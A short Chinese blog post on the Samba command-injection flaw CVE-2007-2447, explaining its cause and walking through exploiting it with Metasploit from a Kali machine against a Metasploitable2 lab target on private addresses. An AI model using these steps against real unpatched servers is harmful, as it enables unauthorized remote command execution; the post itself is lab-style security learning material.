CVE:CVE-2007-2447
原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
?
漏洞利用:攻击机 kali
IP 192.168.129.133
靶机 Metasploitable2
IP 192.168.129.128
?
msf中搜索samba
use 13 选择漏洞
show options 查看选项
set RHOSTS 设置要攻击的ip
exploit 开始攻击
之后uname -a验证
?
@H_301_83@ 总结以上是内存溢出为你收集整理的Samba远程Shell命令注入执行漏洞全部内容,希望文章能够帮你解决Samba远程Shell命令注入执行漏洞所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)